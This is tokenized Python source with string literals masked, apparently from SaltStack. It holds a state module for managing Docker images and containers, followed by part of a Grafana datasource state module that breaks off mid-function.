<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import functools <EOL> import logging <EOL> from salt . ext . six import string_types <EOL> import salt . utils <EOL> import salt . ext . six as six <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return __virtualname__ <EOL> return False <EOL> INVALID_RESPONSE = '<STR_LIT>' <EOL> VALID_RESPONSE = '<STR_LIT>' <EOL> NOTSET = object ( ) <EOL> def _ret_status ( exec_status = None , <EOL> name = '<STR_LIT>' , <EOL> comment = '<STR_LIT>' , <EOL> result = None , <EOL> changes = None ) : <EOL> if not changes : <EOL> changes = { } <EOL> if exec_status is None : <EOL> exec_status = { } <EOL> if exec_status : <EOL> if result is None : <EOL> result = exec_status [ '<STR_LIT:status>' ] <EOL> scomment = exec_status . get ( '<STR_LIT>' , None ) <EOL> if scomment : <EOL> comment += '<STR_LIT:\n>' + scomment <EOL> out = exec_status . get ( '<STR_LIT>' , None ) <EOL> if out : <EOL> if isinstance ( out , string_types ) : <EOL> comment += '<STR_LIT:\n>' + out <EOL> return { <EOL> '<STR_LIT>' : changes , <EOL> '<STR_LIT:result>' : result , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : comment , <EOL> } <EOL> def _valid ( exec_status = None , name = '<STR_LIT>' , comment = '<STR_LIT>' , changes = None ) : <EOL> return _ret_status ( exec_status = exec_status , <EOL> comment = comment , <EOL> name = name , <EOL> changes = changes , <EOL> result = True ) <EOL> def _invalid ( exec_status = None , name = '<STR_LIT>' , comment = '<STR_LIT>' , changes = None ) : <EOL> return _ret_status ( exec_status = exec_status , <EOL> comment = comment , <EOL> name = name , <EOL> changes = changes , <EOL> result = False ) <EOL> def _get_image_name ( image , tag ) : <EOL> if '<STR_LIT::>' not in image : <EOL> return '<STR_LIT::>' . join ( ( image , tag ) ) <EOL> return image <EOL> def _parse_volumes ( volumes ) : <EOL> '''<STR_LIT>''' <EOL> log . trace ( "<STR_LIT>" + str ( volumes ) ) <EOL> bindvolumes = { } <EOL> contvolumes = [ ] <EOL> if isinstance ( volumes , dict ) : <EOL> bindvolumes = volumes <EOL> if isinstance ( volumes , list ) : <EOL> for vol in volumes : <EOL> if isinstance ( vol , dict ) : <EOL> for volsource , voldef in vol . items ( ) : <EOL> if isinstance ( voldef , dict ) : <EOL> target = voldef [ '<STR_LIT>' ] <EOL> read_only = voldef . get ( '<STR_LIT>' , False ) <EOL> else : <EOL> target = str ( voldef ) <EOL> read_only = False <EOL> source = volsource <EOL> else : <EOL> if '<STR_LIT::>' in vol : <EOL> volspec = vol . split ( '<STR_LIT::>' ) <EOL> source = volspec [ <NUM_LIT:0> ] <EOL> target = volspec [ <NUM_LIT:1> ] <EOL> read_only = False <EOL> try : <EOL> if len ( volspec ) > <NUM_LIT:2> : <EOL> read_only = volspec [ <NUM_LIT:2> ] == "<STR_LIT>" <EOL> except IndexError : <EOL> pass <EOL> else : <EOL> contvolumes . append ( str ( vol ) ) <EOL> continue <EOL> bindvolumes [ source ] = { <EOL> '<STR_LIT>' : target , <EOL> '<STR_LIT>' : read_only <EOL> } <EOL> result = { '<STR_LIT>' : bindvolumes , '<STR_LIT>' : contvolumes } <EOL> log . trace ( "<STR_LIT>" + str ( result ) ) <EOL> return result <EOL> def mod_watch ( name , sfun = None , * args , ** kw ) : <EOL> if sfun == '<STR_LIT>' : <EOL> kw [ '<STR_LIT>' ] = True <EOL> build_status = built ( name , ** kw ) <EOL> result = build_status [ '<STR_LIT:result>' ] <EOL> status = _ret_status ( build_status , name , result = result , <EOL> changes = { name : result } ) <EOL> return status <EOL> elif sfun == '<STR_LIT>' : <EOL> remove_container = __salt__ [ '<STR_LIT>' ] <EOL> remove_status = _ret_status ( remove_container ( container = name , <EOL> force = True ) , <EOL> name = name ) <EOL> installed_status = installed ( name = name , ** kw ) <EOL> result = installed_status [ '<STR_LIT:result>' ] and remove_status [ '<STR_LIT:result>' ] <EOL> comment = remove_status [ '<STR_LIT>' ] <EOL> status = _ret_status ( installed_status , name = name , <EOL> result = result , <EOL> changes = { name : result } , <EOL> comment = comment ) <EOL> return status <EOL> elif sfun == '<STR_LIT>' : <EOL> container = kw . get ( '<STR_LIT>' , name ) <EOL> kill_signal = kw . get ( '<STR_LIT>' ) <EOL> if kill_signal : <EOL> killer = __salt__ [ '<STR_LIT>' ] <EOL> status = _ret_status ( killer ( container , signal = kill_signal ) , <EOL> name = name , <EOL> changes = { name : True } ) <EOL> else : <EOL> restarter = __salt__ [ '<STR_LIT>' ] <EOL> status = _ret_status ( restarter ( container ) , <EOL> name = name , <EOL> changes = { name : True } ) <EOL> return status <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sfun ) ) } <EOL> def pulled ( name , <EOL> tag = '<STR_LIT>' , <EOL> force = False , <EOL> insecure_registry = False , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( image_name ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> previous_id = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] if image_infos [ '<STR_LIT:status>' ] else None <EOL> pull = __salt__ [ '<STR_LIT>' ] <EOL> returned = pull ( name , tag = tag , insecure_registry = insecure_registry ) <EOL> if previous_id != returned [ '<STR_LIT:id>' ] : <EOL> changes = { name : { '<STR_LIT>' : previous_id , <EOL> '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> else : <EOL> changes = { } <EOL> comment = '<STR_LIT>' <EOL> return _ret_status ( returned , name , changes = changes , comment = comment ) <EOL> def pushed ( name , tag = '<STR_LIT>' , insecure_registry = False ) : <EOL> '''<STR_LIT>''' <EOL> image_name = _get_image_name ( name , tag ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> push = __salt__ [ '<STR_LIT>' ] <EOL> returned = push ( name , tag = tag , insecure_registry = insecure_registry ) <EOL> log . debug ( "<STR_LIT>" + str ( returned ) ) <EOL> if returned [ '<STR_LIT:status>' ] : <EOL> changes = { name : { '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> else : <EOL> changes = { } <EOL> return _ret_status ( returned , name , changes = changes ) <EOL> def loaded ( name , tag = '<STR_LIT>' , source = None , source_hash = '<STR_LIT>' , force = False ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( image_name ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> tmp_filename = salt . utils . mkstemp ( ) <EOL> __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' , <EOL> name = tmp_filename , <EOL> source = source , <EOL> source_hash = source_hash ) <EOL> changes = { } <EOL> if image_infos [ '<STR_LIT:status>' ] : <EOL> changes [ '<STR_LIT>' ] = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> remove_image = __salt__ [ '<STR_LIT>' ] <EOL> remove_info = remove_image ( image_name ) <EOL> if not remove_info [ '<STR_LIT:status>' ] : <EOL> return _invalid ( name = name , <EOL> comment = '<STR_LIT>' . format ( name ) ) <EOL> load = __salt__ [ '<STR_LIT>' ] <EOL> returned = load ( tmp_filename ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] : <EOL> changes [ '<STR_LIT>' ] = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> return _invalid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( image_name ) ) <EOL> return _ret_status ( returned , name , changes = changes ) <EOL> def built ( name , <EOL> tag = '<STR_LIT>' , <EOL> path = None , <EOL> quiet = False , <EOL> nocache = False , <EOL> rm = True , <EOL> force = False , <EOL> timeout = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> inspect_image = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( name , tag ) <EOL> image_infos = inspect_image ( image_name ) <EOL> if image_infos [ '<STR_LIT:status>' ] and not force : <EOL> return _valid ( <EOL> name = name , <EOL> comment = '<STR_LIT>' . format ( <EOL> image_name , image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : None , <EOL> '<STR_LIT>' : comment } <EOL> previous_id = image_infos [ '<STR_LIT>' ] [ '<STR_LIT>' ] if image_infos [ '<STR_LIT:status>' ] else None <EOL> build = __salt__ [ '<STR_LIT>' ] <EOL> kw = dict ( tag = image_name , <EOL> path = path , <EOL> quiet = quiet , <EOL> nocache = nocache , <EOL> rm = rm , <EOL> timeout = timeout , <EOL> ) <EOL> returned = build ( ** kw ) <EOL> if previous_id != returned [ '<STR_LIT:id>' ] : <EOL> changes = { name : { '<STR_LIT>' : previous_id , <EOL> '<STR_LIT>' : returned [ '<STR_LIT:id>' ] } } <EOL> comment = '<STR_LIT>' . format ( image_name ) <EOL> else : <EOL> changes = { } <EOL> comment = '<STR_LIT>' <EOL> return _ret_status ( exec_status = returned , <EOL> name = name , <EOL> changes = changes , <EOL> comment = comment ) <EOL> def installed ( name , <EOL> image , <EOL> tag = '<STR_LIT>' , <EOL> command = None , <EOL> hostname = None , <EOL> user = None , <EOL> detach = True , <EOL> stdin_open = False , <EOL> tty = False , <EOL> mem_limit = None , <EOL> ports = None , <EOL> environment = None , <EOL> dns = None , <EOL> volumes = None , <EOL> volumes_from = None , <EOL> cpu_shares = None , <EOL> cpuset = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> create = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( image , tag ) <EOL> iinfos = ins_image ( image_name ) <EOL> if not iinfos [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( image_name ) ) <EOL> cinfos = ins_container ( name ) <EOL> already_exists = cinfos [ '<STR_LIT:status>' ] <EOL> if already_exists : <EOL> return _valid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> dports , denvironment = { } , { } <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if not ports : <EOL> ports = [ ] <EOL> if not volumes : <EOL> volumes = [ ] <EOL> if isinstance ( environment , dict ) : <EOL> for k in environment : <EOL> denvironment [ six . text_type ( k ) ] = six . text_type ( environment [ k ] ) <EOL> if isinstance ( environment , list ) : <EOL> for p in environment : <EOL> if isinstance ( p , dict ) : <EOL> for k in p : <EOL> denvironment [ six . text_type ( k ) ] = six . text_type ( p [ k ] ) <EOL> for p in ports : <EOL> if not isinstance ( p , dict ) : <EOL> dports [ str ( p ) ] = { } <EOL> else : <EOL> for k in p : <EOL> dports [ str ( p ) ] = { } <EOL> parsed_volumes = _parse_volumes ( volumes ) <EOL> bindvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> contvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> kw = dict ( <EOL> binds = bindvolumes , <EOL> command = command , <EOL> hostname = hostname , <EOL> user = user , <EOL> detach = detach , <EOL> stdin_open = stdin_open , <EOL> tty = tty , <EOL> mem_limit = mem_limit , <EOL> ports = dports , <EOL> environment = denvironment , <EOL> dns = dns , <EOL> volumes = contvolumes , <EOL> volumes_from = volumes_from , <EOL> name = name , <EOL> cpu_shares = cpu_shares , <EOL> cpuset = cpuset ) <EOL> out = create ( image_name , ** kw ) <EOL> changes = '<STR_LIT>' <EOL> try : <EOL> cid = out [ '<STR_LIT>' ] [ '<STR_LIT:info>' ] [ '<STR_LIT:id>' ] <EOL> except Exception as e : <EOL> log . debug ( str ( e ) ) <EOL> else : <EOL> changes = '<STR_LIT>' . format ( cid ) <EOL> out [ '<STR_LIT>' ] = changes <EOL> ret = _ret_status ( out , name , changes = changes ) <EOL> return ret <EOL> def absent ( name ) : <EOL> '''<STR_LIT>''' <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> cinfos = ins_container ( name ) <EOL> changes = { } <EOL> if cinfos [ '<STR_LIT:status>' ] : <EOL> cid = cinfos [ '<STR_LIT:id>' ] <EOL> changes [ cid ] = { } <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( cid ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if is_running : <EOL> changes [ cid ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_running : <EOL> return _invalid ( comment = ( "<STR_LIT>" <EOL> . format ( cid ) ) ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_gone = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_gone : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> is_gone = __salt__ [ '<STR_LIT>' ] ( cid ) <EOL> if is_gone : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( cid ) ) , <EOL> changes = { name : True } ) <EOL> else : <EOL> return _valid ( comment = "<STR_LIT>" . format ( name ) ) <EOL> def present ( name , image = None , tag = '<STR_LIT>' , is_latest = False ) : <EOL> '''<STR_LIT>''' <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> cinfos = ins_container ( name ) <EOL> if '<STR_LIT:id>' in cinfos : <EOL> cid = cinfos [ '<STR_LIT:id>' ] <EOL> else : <EOL> cid = name <EOL> if not cinfos [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( cid or name ) ) <EOL> if cinfos [ '<STR_LIT:status>' ] and image is None : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid ) ) <EOL> image_name = _get_image_name ( image , tag ) <EOL> if cinfos [ '<STR_LIT:status>' ] and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ "<STR_LIT>" ] == image_name and not is_latest : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid , image_name ) ) <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> iinfos = ins_image ( image_name ) <EOL> if cinfos [ '<STR_LIT:status>' ] and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] == iinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> return _valid ( comment = '<STR_LIT>' . format ( cid , image_name ) ) <EOL> return _invalid ( comment = '<STR_LIT>' . format ( cid or name ) ) <EOL> def run ( name , <EOL> cid = None , <EOL> hostname = None , <EOL> onlyif = None , <EOL> unless = None , <EOL> docked_onlyif = None , <EOL> docked_unless = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if hostname : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> retcode = __salt__ [ '<STR_LIT>' ] <EOL> drun_all = __salt__ [ '<STR_LIT>' ] <EOL> valid = functools . partial ( _valid , name = name ) <EOL> if onlyif is not None : <EOL> if not isinstance ( onlyif , string_types ) : <EOL> if not onlyif : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( onlyif , string_types ) : <EOL> if not __salt__ [ '<STR_LIT>' ] ( onlyif ) == <NUM_LIT:0> : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if unless is not None : <EOL> if not isinstance ( unless , string_types ) : <EOL> if unless : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( unless , string_types ) : <EOL> if __salt__ [ '<STR_LIT>' ] ( unless ) == <NUM_LIT:0> : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if docked_onlyif is not None : <EOL> if not isinstance ( docked_onlyif , string_types ) : <EOL> if not docked_onlyif : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( docked_onlyif , string_types ) : <EOL> if not retcode ( cid , docked_onlyif ) : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if docked_unless is not None : <EOL> if not isinstance ( docked_unless , string_types ) : <EOL> if docked_unless : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> elif isinstance ( docked_unless , string_types ) : <EOL> if retcode ( cid , docked_unless ) : <EOL> return valid ( comment = '<STR_LIT>' ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name , cid ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> result = drun_all ( cid , name ) <EOL> if result [ '<STR_LIT:status>' ] : <EOL> return valid ( comment = result [ '<STR_LIT>' ] ) <EOL> else : <EOL> return _invalid ( comment = result [ '<STR_LIT>' ] , name = name ) <EOL> def script ( * args , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError <EOL> def running ( name , <EOL> image , <EOL> tag = '<STR_LIT>' , <EOL> container = None , <EOL> command = None , <EOL> hostname = None , <EOL> user = None , <EOL> detach = True , <EOL> stdin_open = False , <EOL> tty = False , <EOL> mem_limit = None , <EOL> ports = None , <EOL> environment = None , <EOL> dns = None , <EOL> volumes = None , <EOL> volumes_from = None , <EOL> start = True , <EOL> cap_add = None , <EOL> cap_drop = None , <EOL> privileged = None , <EOL> lxc_conf = None , <EOL> network_mode = None , <EOL> check_is_running = True , <EOL> publish_all_ports = False , <EOL> links = None , <EOL> restart_policy = None , <EOL> cpu_shares = None , <EOL> cpuset = None , <EOL> kill_signal = None , <EOL> * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if container is None : <EOL> container = name <EOL> ins_image = __salt__ [ '<STR_LIT>' ] <EOL> ins_container = __salt__ [ '<STR_LIT>' ] <EOL> create = __salt__ [ '<STR_LIT>' ] <EOL> image_name = _get_image_name ( image , tag ) <EOL> iinfos = ins_image ( image_name ) <EOL> image_exists = iinfos [ '<STR_LIT:status>' ] <EOL> if not image_exists : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( image_name ) ) <EOL> cinfos = ins_container ( name ) <EOL> already_exists = cinfos [ '<STR_LIT:status>' ] <EOL> already_exists_with_same_image = ( <EOL> already_exists <EOL> and cinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] == iinfos [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ) <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( container ) <EOL> if already_exists_with_same_image and ( is_running or not start ) : <EOL> return _valid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> if not already_exists_with_same_image and already_exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> if is_running : <EOL> stop_status = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not stop_status [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> remove_status = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not remove_status [ '<STR_LIT:status>' ] : <EOL> return _invalid ( comment = '<STR_LIT>' . format ( name ) ) <EOL> already_exists = False <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> comment = '<STR_LIT>' . format ( name ) <EOL> return _ret_status ( name = name , comment = comment ) <EOL> exposeports , bindports , contvolumes , bindvolumes , denvironment , changes = [ ] , { } , [ ] , { } , { } , [ ] <EOL> if not ports : <EOL> ports = { } <EOL> if not volumes : <EOL> volumes = { } <EOL> if not volumes_from : <EOL> volumes_from = [ ] <EOL> if isinstance ( environment , dict ) : <EOL> for key in environment : <EOL> denvironment [ six . text_type ( key ) ] = six . text_type ( environment [ key ] ) <EOL> if isinstance ( environment , list ) : <EOL> for var in environment : <EOL> if isinstance ( var , dict ) : <EOL> for key in var : <EOL> denvironment [ six . text_type ( key ) ] = six . text_type ( var [ key ] ) <EOL> if isinstance ( volumes , dict ) : <EOL> bindvolumes = volumes <EOL> if isinstance ( volumes , list ) : <EOL> for vol in volumes : <EOL> if isinstance ( vol , dict ) : <EOL> source = list ( vol . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if isinstance ( vol [ source ] , dict ) : <EOL> target = vol [ source ] [ '<STR_LIT>' ] <EOL> read_only = vol [ source ] . get ( '<STR_LIT>' , False ) <EOL> else : <EOL> target = str ( vol [ source ] ) <EOL> read_only = False <EOL> bindvolumes [ source ] = { '<STR_LIT>' : target , <EOL> '<STR_LIT>' : read_only <EOL> } <EOL> else : <EOL> contvolumes . append ( str ( vol ) ) <EOL> if isinstance ( ports , dict ) : <EOL> bindports = ports <EOL> if isinstance ( ports , list ) : <EOL> for port in ports : <EOL> if isinstance ( port , dict ) : <EOL> container_port = list ( port . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if isinstance ( port [ container_port ] , dict ) : <EOL> host_port = port [ container_port ] [ '<STR_LIT>' ] <EOL> host_ip = port [ container_port ] . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> host_port = str ( port [ container_port ] ) <EOL> host_ip = '<STR_LIT>' <EOL> bindports [ container_port ] = { <EOL> '<STR_LIT>' : host_port , <EOL> '<STR_LIT>' : host_ip <EOL> } <EOL> else : <EOL> exposeports . append ( str ( port ) ) <EOL> parsed_volumes = _parse_volumes ( volumes ) <EOL> bindvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> contvolumes = parsed_volumes [ '<STR_LIT>' ] <EOL> if not already_exists : <EOL> kwargs = dict ( command = command , <EOL> hostname = hostname , <EOL> user = user , <EOL> detach = detach , <EOL> stdin_open = stdin_open , <EOL> tty = tty , <EOL> mem_limit = mem_limit , <EOL> ports = exposeports , <EOL> environment = denvironment , <EOL> dns = dns , <EOL> binds = bindvolumes , <EOL> volumes = contvolumes , <EOL> name = name , <EOL> cpu_shares = cpu_shares , <EOL> cpuset = cpuset ) <EOL> out = create ( image_name , ** kwargs ) <EOL> try : <EOL> cid = out [ '<STR_LIT>' ] [ '<STR_LIT:info>' ] [ '<STR_LIT:id>' ] <EOL> log . debug ( str ( cid ) ) <EOL> except Exception as e : <EOL> changes . append ( '<STR_LIT>' ) <EOL> log . debug ( str ( e ) ) <EOL> else : <EOL> changes . append ( '<STR_LIT>' . format ( cid ) ) <EOL> if start : <EOL> started = __salt__ [ '<STR_LIT>' ] ( name , <EOL> binds = bindvolumes , <EOL> port_bindings = bindports , <EOL> lxc_conf = lxc_conf , <EOL> publish_all_ports = publish_all_ports , <EOL> links = links , <EOL> privileged = privileged , <EOL> dns = dns , <EOL> volumes_from = volumes_from , <EOL> network_mode = network_mode , <EOL> restart_policy = restart_policy , <EOL> cap_add = cap_add , <EOL> cap_drop = cap_drop ) <EOL> if check_is_running : <EOL> is_running = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> log . debug ( "<STR_LIT>" + str ( started ) ) <EOL> log . debug ( "<STR_LIT>" + str ( is_running ) ) <EOL> if is_running : <EOL> changes . append ( '<STR_LIT>' . format ( name ) ) <EOL> else : <EOL> return _invalid ( comment = ( '<STR_LIT>' <EOL> . format ( name , started [ '<STR_LIT>' ] , ) ) ) <EOL> else : <EOL> changes . append ( '<STR_LIT>' . format ( name ) ) <EOL> return _valid ( comment = '<STR_LIT:\n>' . join ( changes ) , changes = { name : True } ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import requests <EOL> from salt . ext . six import string_types <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' , <NUM_LIT:1> ) == <NUM_LIT:2> <EOL> def present ( name , <EOL> type , <EOL> url , <EOL> access = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT>' , <EOL> basic_auth = False , <EOL> basic_auth_user = '<STR_LIT>' , <EOL> basic_auth_password = '<STR_LIT>' , <EOL> is_default = False , <EOL> json_data = None , <EOL> profile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( profile , string_types ) : <EOL> profile = __salt__ [ '<STR_LIT>' ] ( profile ) <EOL> ret = { '<STR_LIT:result>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> datasource = _get_datasource ( profile , name ) <EOL> data = _get_json_data ( name , type , url , access , user , password , database , <EOL> basic_auth , basic_auth_user , basic_auth_password , is_default , json_data ) <EOL> if datasource : <EOL> requests . put ( <EOL> _get_url ( profile , datasource [ '<STR_LIT:id>' ] ) , <EOL> data , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = _diff ( datasource , data ) <EOL> if ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] or ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> requests . post ( <EOL> '<STR_LIT>' . format ( profile [ '<STR_LIT>' ] ) , <EOL> data , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = data <EOL> return ret <EOL> def absent ( name , profile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( profile , string_types ) : <EOL> profile = __salt__ [ '<STR_LIT>' ] ( profile ) <EOL> ret = { '<STR_LIT:result>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> datasource = _get_datasource ( profile , name ) <EOL> if not datasource : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> requests . delete ( <EOL> _get_url ( profile , datasource [ '<STR_LIT:id>' ] ) , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> def _get_url ( profile , datasource_id ) : <EOL> return '<STR_LIT>' . format ( <EOL> profile [ '<STR_LIT>' ] , <EOL> datasource_id <EOL> ) <EOL> def _get_datasource ( profile , name ) : <EOL> response = requests . get ( <EOL> '<STR_LIT>' . format ( profile [ '<STR_LIT>' ] ) , <EOL> headers = _get_headers ( profile ) , <EOL> timeout = profile . get ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ) <EOL> data = response . json ( ) <EOL> for datasource in data : <EOL> if datasource [ '<STR_LIT:name>' ] == name : <EOL> return datasource <EOL> return None <EOL> def _get_headers ( profile ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( profile [ '<STR_LIT>' ] ) <EOL> } <EOL> def _get_json_data ( name , <EOL> type , <EOL> url , <EOL> access = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT>' , <EOL> basic_auth = False , <EOL> basic_auth_user = '<STR_LIT>' , <EOL> basic_auth_password = '<STR_LIT>' , <EOL> is_default = False , <EOL> json_data = None ) : <EOL> return { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:type>' : type , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : access , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : database , <EOL> 